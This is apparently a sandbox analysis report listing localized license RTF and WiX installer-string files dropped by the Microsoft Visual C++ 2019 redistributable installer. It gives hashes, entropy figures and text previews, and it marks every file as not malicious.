                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1045\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13265
                                                                        Entropy (8bit):5.358483628484379
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
                                                                        MD5:5B9DF97FC98938BF2936437430E31ECA
                                                                        SHA1:AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
                                                                        SHA-256:8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
                                                                        SHA-512:4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1045\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1046\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10656
                                                                        Entropy (8bit):5.092962528947159
                                                                        Encrypted:false
                                                                        SSDEEP:192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
                                                                        MD5:360FC4A7FFCDB915A7CF440221AFAD36
                                                                        SHA1:009F36BBDAD5B9972E8069E53855FC656EA05800
                                                                        SHA-256:9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
                                                                        SHA-512:9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Estes termos de licen\'e7a formam um contrato firmado entre a Microsoft Corporation (ou com base no seu pa\'eds de resid\'eancia, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\t

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1046\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1049\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31915
                                                                        Entropy (8bit):3.6440775919653996
                                                                        Encrypted:false
                                                                        SSDEEP:384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
                                                                        MD5:A59C893E2C2B4063AE821E42519F9812
                                                                        SHA1:C00D0B11F6B25246357053F6620E57D990EFC698
                                                                        SHA-256:0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
                                                                        SHA-512:B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset204 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\f1\lang9 MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0\f0\lang1049\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0 \'e2\'e0\'f8\'e5\'e3\'ee \'ef\'f0\'ee\'e6\'e8\'e2\'e0\'ed\'e8\'ff, \'ee\

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1049\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1055\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13379
                                                                        Entropy (8bit):5.214715951393874
                                                                        Encrypted:false
                                                                        SSDEEP:192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
                                                                        MD5:BD2DC15DFEE66076BBA6D15A527089E7
                                                                        SHA1:8768518F2318F1B8A3F8908A056213042A377CC4
                                                                        SHA-256:62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
                                                                        SHA-512:9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan anla\'bamay\u305? olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\par..\b BU L\f1\u304?SANS \'aaARTLARINA UYDU\u286?UNUZ TAKD\u304?RDE A\'aaA\u286?IDAK\u3

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1055\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\2052\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):17863
                                                                        Entropy (8bit):3.9617786349452775
                                                                        Encrypted:false
                                                                        SSDEEP:192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
                                                                        MD5:3CF16377C0D1B2E16FFD6E32BF139AC5
                                                                        SHA1:D1A8C3730231D51C7BB85A7A15B948794E99BDCE
                                                                        SHA-256:E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
                                                                        SHA-512:E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\2052\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\3082\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10714
                                                                        Entropy (8bit):5.122578090102117
                                                                        Encrypted:false
                                                                        SSDEEP:192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
                                                                        MD5:FBF293EE95AFEF818EAF07BB088A1596
                                                                        SHA1:BBA1991BA6459C9F19B235C43A9B781A24324606
                                                                        SHA-256:1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
                                                                        SHA-512:6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\3082\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

                                                                        C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\BootstrapperApplicationData.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (591), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13188
                                                                        Entropy (8bit):3.7277002414324074
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0s1PoDnH5zHqQHG0Hd8Hz7HE06HA0rH3pKp5cxLU71zLG0Lw4cBx7z8NkzzkvQY:X0sN0dLbmnoNEQkxJM4ZVEpPEv
                                                                        MD5:58518543644BAA7BFC6B67B251AF84FF
                                                                        SHA1:97D4538050BB6D1BDE14A918385038E651389E33
                                                                        SHA-256:650B3CC3CDB3630ED9FCF8E5E493E28586B5F7768F5ADC317D884B8184CBE15E
                                                                        SHA-512:A2F2E514A941972E85CDA0DACC154EDF5BBADFD32359FE79203EE28A048E4AD16712078B468515F5CDDA625DFCA3CF5EEFFCE3D3CCFA254841958BC0806B1726
                                                                        Malicious:false
